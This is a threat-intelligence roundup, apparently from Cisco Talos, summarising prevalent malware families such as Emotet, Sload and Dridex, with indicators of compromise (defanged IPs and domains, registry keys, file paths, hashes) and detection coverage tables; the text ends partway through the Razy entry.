Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 25 and Oct. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Doc.Malware.Emotet-9766089-0 Malware Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Doc.Malware.Sload-9765483-0 Malware The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell may download the final payload or another downloader.
Doc.Malware.Sagent-9765485-0 Malware Sagent downloads and executes a binary using PowerShell from a Microsoft Word document.
Doc.Dropper.Valyria-9768469-0 Dropper Valyria is a malicious Microsoft Word document family that is used to distribute other malware, such as Emotet.
Win.Malware.Barys-9768982-0 Malware This is a trojan and downloader that allows malicious actors to upload files to a victim's computer.
Win.Packed.Razy-9768972-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Trojan.Bifrost-9768974-0 Trojan Bifrost is a backdoor with more than 10 variants. Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker to execute arbitrary code on the compromised machine. Bifrost contains standard RAT features including a file manager, screen capture utility, keylogging, video recording, microphone and camera monitoring, and a process manager. Bifrost uses a mutex that may be named "Bif1234" or "Tr0gBot" to mark its presence on the system.
Win.Trojan.Zbot-9769359-0 Trojan Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
Win.Packed.Dridex-9768984-0 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.

Threat Breakdown

Doc.Malware.Emotet-9766089-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 68 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
13
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT 3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\DEFAULTICON 3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\OPEN\COMMAND 3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINT\COMMAND 3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINTTO\COMMAND 3
<HKCU>\SOFTWARE\JOSEFSSON 2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH 2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH\RECENT FILE LIST 2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH\SETTINGS 2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL 2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\OPEN 2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINT 2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINTTO 2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBDBE
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RADARDT
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DOT3GPCLNT
Value Name: ImagePath
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
62[.]234[.]99[.]30 68
174[.]113[.]69[.]136 42
51[.]38[.]124[.]206 29
91[.]105[.]94[.]200 11
155[.]186[.]0[.]121 9
208[.]100[.]26[.]245 1
172[.]67[.]176[.]226 1
172[.]67[.]139[.]128 1
104[.]18[.]54[.]117 1
157[.]245[.]178[.]49 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
boys86[.]com 68
e13678[.]dspb[.]akamaiedge[.]net 15
www[.]cloudflare[.]com 1
fepami[.]com 1
dacyclin[.]com 1
www[.]business-management-degree[.]net 1
xnxxfullhd[.]com 1
Files and or directories createdOccurrences
%HOMEPATH%\FY6iR_w 68
%HOMEPATH%\FY6iR_w\bD8J_41 68
%HOMEPATH%\Fy6ir_w\Bd8j_41\E0c6vgg.exe 68
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 16
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 5
%SystemRoot%\SysWOW64\NlsLexicons0046 2
%System32%\user32\tapisrv.exe (copy) 2
%System32%\spp\store\2.0\data.dat.tmp 1
%System32%\uudf\msiwer.exe (copy) 1
%System32%\Windows.Gaming.Preview\tzres.exe (copy) 1
%System32%\mcupdate_GenuineIntel\poqexec.exe (copy) 1

File Hashes

0132a53946f8fd63dd5709b4ecb5004ea11fc2beaec94ef5e017453c0142f905
082b657e6fc18dd578b33ff31b260c6951ccebcb4cd71e19852a609ca723a27b
0849d06487556039dd4ce57a9338b26c767fda17fbbb5e5876fd1090295ced11
0bb2936e529012cf02cb1f7609fa7287b49bd3a5130689aa0fbea224394e208b
0bf1382d9493a03c8b56f2befa1ada29ce2ac87dbde3a1c02a0742a95e630a5c
12c96f80fe4fb65075234dbad10058e7efbe9f07774d8ca20219f5b5fd0b7c00
1312e631f80e724ea637d1b035eb3342f09a32208ab559bc85cd5820956a5755
14b8acf04483277af0342148ad78291ceb2393d22002c123a588e6b76c9c9d3d
17395a5b140f7d5690341de536c715c0258e71236e00c46aef0913301419aa57
195497c9eef9d1ebcd88ff1072c76da4a9e2ec082f586c01c493d28f70c386ec
1a6ee7bebb2357d095b418809d640b0d6f806698e8657de50cd48c93f0e92d74
1ac42c93a5c7ed2032a573c91d229836148d58174b546d68fad1283466142b01
1f51bcef87e327d29ffad24ec36cb016442f41bc9d06989b527e05c0b79550df
219b5d039e4a109011e021799762a7dddecbc2c5e6f75294daac8bb6454790a5
2df2c1608e75dc3162882ed50ee37c43d174deb4d1ce6fc85fc1386efb6a1b71
2e5cf7a36eba949a076059c64011466d48fabd37a7ea5a23bddf0f63de7e7952
3345219199def661640c5182b7491c413702216149790bcddd8d884e9bcd112e
369580713eae08e2f56eb5350eebcc9e3fb28e1f88abf5b18b726fb6ac50d843
370530ab4dc609acab76596c874f60ec5b1969fe7db26584a036286572a7e0a4
374479a115841ea03babcd76b6245d0123aa969af8f5eeb27277397ce574562a
37ab1a64ee62c8f9b5d4241f788ac2ca6bfe3239460f411f848b7b1baf187976
4142cb49199a7efe52b944caff9ab5b07d61438a9fc89a413199b2f801aec9d8
41a035835264e22d0533d34539e7ae0db8573b8b7bb013a5ad3fddfc6965884c
43be6d6834d6347397c37b76980ba172a1bf750ee9c89cbf6c125df91e916d47
45af7091348e94523fcf93e8b5a0b895bfb10b778f2af8e04996845c8ee1e1d5

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Doc.Malware.Sload-9765483-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
MutexesOccurrences
Global\MsoShellExtRegAccess_S-1-5-21-2580483871-590521980-3826313501-500 35
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
217[.]144[.]104[.]39 35
103[.]214[.]167[.]114 35
51[.]254[.]205[.]84 35
2[.]59[.]117[.]6 35
139[.]162[.]210[.]105 35
103[.]130[.]219[.]49 35
67[.]199[.]248[.]10/31 31
51[.]77[.]231[.]185 2
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]litespeedtech[.]com 35
api[.]w[.]org 35
gmpg[.]org 35
t[.]me 35
www[.]xinwenlook[.]com 35
kpisolutions[.]net 35
fgyapim[.]com 35
atomic-soft[.]com 35
auto-boot-like[.]com 35
salamatbanoo[.]ir 35
bit[.]ly 31
aragrp[.]com 24
schema[.]org 6
e13678[.]dspb[.]akamaiedge[.]net 6
mysterythemes[.]com 6
demo[.]mysterythemes[.]com 6
www[.]aparat[.]com 4
data-vocabulary[.]org 1
image[.]rakuten[.]co[.]jp 1
www[.]shonanbbq[.]jp 1
thumbnail[.]image[.]rakuten[.]co[.]jp 1
shop[.]r10s[.]jp 1
www[.]rtl-theme[.]com 1
Files and or directories createdOccurrences
\Kiloperit\Loterios.exe 35
\Kiloperit 35
\Kiloperit\Groters.cmd 35
%ProgramData%\Helpot.vbs 35
%ProgramData%\Kolester.vbs 35

File Hashes

03c9fc78d2a6a7b6682111d70fd47483dbcce7b5b2b7395d9cb5e6bc53853b41
049fafbcead9f25231523454a2e9a0f6f53c1a994574d790725b5f7fdf9ad303
068e4de9a05da6cd60cea869b60a1b35b074d2d1209825ac8503ab0aff03e6a4
08f1e023603c5bbded2234f3da049ee5099d6acb02bd67f316755d3b5f05d8f5
0b74d64a1aa19b4cbf85eb94621ef62ea2a32d0b6fe7879f367e9b8de0816430
0e36f81f0332a4b6bca8e807abb020fe654be9a3e9022aed3ea071f888e97fdf
0f724265d9d4e4ffc4581971c97888235f8593435ff8c608e3cc53397bb5431d
0fdfa93636214d614b2b094d8a03de06abc0364ff5a4abfcbd0d9aa4f826521e
0ff59a32b7bb2a427995b7ada58410acd2aaf9a5a2a1b430300bb47bc678a269
1169a93ffa8c8a5b0a59f9c40b87fb10aca1400afabc34c8319a23b94e327312
16373f1b4582fefb527d420af700d11aabea5f8d04d4481a03253d698b5ed94f
182cedbb86f96a286d1f96d07a4aae0657e00759e68f35ac9b676e7a176d6dbf
1fdae763089dbe2e5e7083aa069b7cecb329d1e894cf443f11fa87b3cbe72919
20a600f4b85f601331e413e77e01def30375b5d12e8da0e283492fbf21603244
221aa40298b5256a2b79a0ba852c44f4f23e140461741ea73d686965e38a1361
258b991f4469d86316d73570a60c90ab04e5a4acd04c5685f9008df04a1c07df
26006a31ba4d51e415e005679b9ea5ea774d0e514668d0f77b53eafc60233bec
284db9216a0a55d8a72701e87aaea55eee5ac946dad7b37448f4eeb50e178989
2d140448346ac6b67b82091edceb992173989430b8b85fd55568a93e4092a625
2de306c8ff840bf87140f7774c0ed7c6dcbd4ada5db466311d8b9646d121afe0
34155568221422e29e5dc298e3e3be175f011b1e3412d32aba1676bfa3d5f995
3a2a758659051bb3a626c13d9eab2397d140de4b637a3e950e710d53a31fb017
3b6a9c380922f886ae04d45f888415278f0a5c7f7915f7f10f119ce042dc605c
3e90ed6a177d0200853ef7cffd29d202309a8b2d1d2006b7e3b89aa1a28de58e
3eca4c3c9bc710f41c2f8d947aba877de39f5c887e4b1d1d29950a729216472c

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Doc.Malware.Sagent-9765485-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\CRYPTOGRAPHY\AUTOENROLLMENT 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119110000000000000000F01FEC
Value Name: VBAFiles
3
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
13[.]32[.]202[.]80 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
fantasticvilla[.]xyz 23
e13678[.]dspb[.]akamaiedge[.]net 10
Files and or directories createdOccurrences
%HOMEPATH%\N5uIJVSp.dll 23
%APPDATA%\PC 23
%HOMEPATH%\N5uIJVSp.doc (copy) 23
%SystemRoot%\cer<random, matching '[A-F0-9]{3,4}'>.tmp 23

File Hashes

069e5be54a90423032dfb6d1427e79a9b0381b4ffd062b654a7cdf9764b89bc7
08e372f1bc0ab96dde9ffb0f62335dbe3556e40e11e1f49eec40454915b72a43
0f7f4bf60ff258518f2a5c3b2b8c5ee416f8a434b672f78b298946f536af2ad5
1d844ffbf1b97697df3bc2a3ad68d66cdfe697c7b73c49c5c877910846a400dc
240d2dc4b7fe6e02afcb86581c04c97afc57ce646a63d3abcecbddf82e550aae
392eb105fbbc2990e8dc4f218d15a6a969d685230404d4b1af0339e8f694ae90
4a0b98b381bd601807bff594232ec7364d16dab8625cea24b4cf2dfeda2b1722
4aa80e96b81fbb0fe08646924ea974214c6fe394b32070fa2c1a67c7674e7901
6701a28e9f57760ba2816239bf9e4fe1cd0d6150b20b2e72d6eef8cdf64739db
6d1cb4ece476b54c928e1347fd2449594bb075e16b6ba4deea1fc573a63e4d8f
94c6b071d11e998abc16abbb0c3a8d856027a9eb410d6d70535f50ea2d7e0883
9f847b64223c4f284777b6eeeba9736b774d64dfccf626f0f9c1a3f1e3dfbd0f
aa2aefaeae7bba2f4814dfec71f48f619d9f47be213826d7de276fd999be3468
b38940afbc89af2a23ccb1c840c72f491fbb4cb955d82d43a83389660989a511
b7f0ec3f3b6a646ef56ab82745f31acbf842f4c107eee2b806f472867d2d96b1
c489afa673a152b4d4358d2541f8bf6256422d752f6a982aa5a9bc7c96d70b69
c6cd1a6759f8ea66bccc06824ed5d45c12d99c7b439f86151bf81c7f9c37ec15
d5dfe06d9fcb8aaccb1f3b4613d18c52ebb50f8ab2e8b1860968223286f21b50
e0d529d5aca4158976cbe5fa6578db3bc2dc2d962b01f0ade9626607e4b86613
e62efa2caf7914cd07c175ea92e67a41a24d88232fd36fa3518a97b418f4561f
eb5fb231b6e4e0afaa51fbd2d91035d0f1f6369aaf69236a6acb5d3ac63f88c4
edd370a3535870cbd5e9b63d309cd380a57a9cf211b24dccac5ea31504674104
fc11ee7210e628fad862303d9fb5c1bd0129583cd9bb55188b9042ffce4494ba

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Doc.Dropper.Valyria-9768469-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\PARAMETERS
Value Name: TrapPollTimeMilliSecs
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_FolderType
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_TopViewID
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_TopViewVersion
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\PARAMETERS 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS\SAVE AS 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS\SAVE AS
Value Name: ClientGUID
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\COMDLG32\CIDSIZEMRU
Value Name: 6
2
MutexesOccurrences
Local\SHResolveLibrary:C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Libraries/Documents.library-ms 2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
212[.]13[.]197[.]229 18
198[.]54[.]126[.]167 9
162[.]241[.]253[.]225 7
72[.]21[.]81[.]240 6
173[.]231[.]210[.]20 2
204[.]79[.]197[.]200 1
23[.]3[.]13[.]154 1
8[.]253[.]131[.]111 1
8[.]248[.]159[.]254 1
8[.]253[.]45[.]248 1
8[.]249[.]221[.]254 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
chiark[.]greenend[.]org[.]uk 18
1[.]0[.]168[.]192[.]in-addr[.]arpa 14
ctldl[.]windowsupdate[.]com 11
e13678[.]dspb[.]akamaiedge[.]net 9
secure[.]zenithglobalplc[.]com 9
lxj[.]vvn[.]mybluehost[.]me 7
cs11[.]wpc[.]v0cdn[.]net 6
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 4
229[.]197[.]13[.]212[.]in-addr[.]arpa 2
aonefire[.]com 2
a767[.]dscg3[.]akamai[.]net 1
Files and or directories createdOccurrences
\MyImages\presskey.cmd 18
\MyImages\presskey.jse4 18
\MyImages\presskey.jse5 18
\MyImages\presskey2.cmd 18
\MyImages\tlofgkkjl15g5k.vbs 18
\MyImages\presskey.jse 11
\MyImages\presskey.jse1 7

File Hashes

0763afbc2854ad1a778ce74d34384d70ea4f9700108529434579e2452e7616e8
13d90425013b1b9d5bd36efad568c8aa6451aba613c11e8bc38380dc778e3aca
142fbde8f0ed0392402e39accf80649cf37edc9e67662eb74c214eb6566302a5
1747795ab70151ee92bc7b137fed9113751696978c2142f48d06d1b28b6ef752
24f8059fb0b81524cb8a7d389b52cc85d439eb70529b8b183876476400487372
2e4e9f88b324275f54d7da18c45bfdaef4dffcdbcf74abdd10ef52ff8e06dbe7
3624e7b0af4de82e10b32a05c02583f97deeb68a438906eafd081617aef0f28b
3c2068fd550c6f7e49c0bca430e8b5bfe01d622664a8cf4df7390368165e06a1
43968b1964539af7e324020ee115c9077ae05343d12049af64e3044162658a61
445be5b0d364fb3a0fbb95d9520668e1381c827c3c8ccaf3b5354f8be68ba5ed
46c4d5407510f539b60baf782325bc13725c6f0ac0051e550d0fcd55ad96d5b6
4a79e639ccdf548998e0bb4472a3e30d67097fa767b71f97580204e94123e2b1
4b3bbbf1989dc44d5b5585110c8617cf747f611e7e64f0995bb92f09d49edc42
4ff84daba070222612ea822569260e1a24c21453eaa8647e98ce8b97a2c74b59
55a3e9bd013370331847bbf9838d9adf2f995f6676bf1f43afc81d6c42d42c4e
5922457d20c683917861b1692c986ca7165353991bafadf5b7f97976b098e2bf
5c4f89b78a4a4385a59e37e8f27addd76ba92ef6bea004efe8df0cc3b64e0cd2
620c0f6ba309363d466cc3128ebd9dba839c2698d7b9200b69928a46ade48c08
64354d6d5fd79d411047546bccee5a0d8172fb441339d31af4302e9d22a78251
6f9bb1b5002a941594c5486e18fc4da814bd0a31ea87c1068b74cb47b8cfa785
7db6bdadbf208eaccb3407f5a49bf9e9d30b9ab4cc8b13c588c0a5cb8a957a8c
8a8cf14073821bd0b835b3e6f9c901b72dff9a2872ce022ff54729ef4f8061f3
9deea1e83272e064cb6a8e0c079f68d910c61a17266f5db971094273d67adad1
a4b183801d7b9d6deb9c9d0cdb87e2826f098d0e8728b27961750f9e279e0a18
ab756f9a44ecd9dce64429f0954a7569eb42caf72211c1742306cfb2afe7c669

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Malware.Barys-9768982-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{<random GUID>} 25
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{<random GUID>}
Value Name: stubpath
25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
174[.]139[.]60[.]11 24
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
dontkillme 25
gameover 25
www[.]spod[.]co[.]kr 25
list[.]bestxss[.]com 25
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\vcapi.exe 25
%System32%\vcapi.exe 24

File Hashes

00256bcc35c0c7004acc53e0a4ad53c98125eecfebb4617037a510e316053e3f
00e9342088466c4f297ceff0c29a6d93e1042cebbb020086737e2c23fb5fd8f7
0149f85b76b7047e7dacc9e6fbaab15124efc4346cfcf2f2b97b89a459d034e5
01d1a5e8df4b98a9375e58085229a10285539fad6c673411fa2a50829cb3b1eb
0327103ffba061460ff64e12e78bb4a7332130d26f42be26c330a76faf542747
042bdbe65551e201336abec0466991c0d354ffe2fbd7d98dba40fe96ea24114e
04df17c026f6c5939abd3a0d30f5b30b40c3f7ebaf0a30a71ae4f51fea87732c
062dc39345c17ef320ee5be6be9815835e7b9cf6cd0f8d8ec17e56c111d61cb6
06655581bb6aa3947a64692df24726ee0288477f477fac1a92dde198102e76dd
069f1708d0e4dd2a26adb648aa167e4e9c297f881db0ffc40e72c10096086980
0741c31bbd51e0e572eb3860bfbf433d2812de47eccb6fc23ed1747a6e7fdc15
07da54d55de29f61552b03303774a823c8eccbdf8e2db0ec7eb2a49417b7c204
07ea49b04d837e13a3d26581811aad04ffd70bca7a2700f7ccac13744939996c
0872749a8c13f73c059289f38b6b429923b89fed5bde71fa3826eb4f49f89971
0944098a6dca28f17dca8ff987ab25c0dce278f73c6649b733c88c3d616fdb19
0988e9a5f85fc29f9b2d1d4b04934aef275938e42fe108d9101f2f8d83bfa2ac
09a64cfb87d5c1b5991222d51a38a7fd589e3ac12c1bce911a34b53b36ead441
0a51fc1d6e30f7a7c1d86632827d639f4348afcf88946dd5335cf8c6794e4079
0a7cca59895edd7c5807d22434ae2093e21a6149df8a15fc7e0b57da73e4098c
0bd735feb076df39e99b517cb6e5ea653154595c5c48da48cbc3a262bde4fc72
0cb182a2d5baf6e61553065b09e6541175dfba1eac79d1d5bc1138c6ef0944ed
0d1e719eced86f9108291825f08b61c0cebd5b6d0aa1eef27b7119e774f09fc2
0dc9b496cc873294a34fd8f45298f5041269c64501ec95304d5b39cdc50c8994
0e6b00afa8b69c1a552a296ec76306cb1a0b564fe56743130d266a89e0e5f1f5
0fb7c9ec256d507416ea191a810c33c3b15f15de668eded789f5bc0f8e4b74b3

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9768972-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 19
MutexesOccurrences
{24d07012-9955-711c-e323-1079ebcbe1f4} 19
{fa55c581-7c66-eeeb-7446-e85cdd6e7a03} 19
{1cd1f8a6-f7bb-04d1-d80f-2a4c87e86995} 19
{c52654a1-56b4-1379-a079-9399d3529237} 19
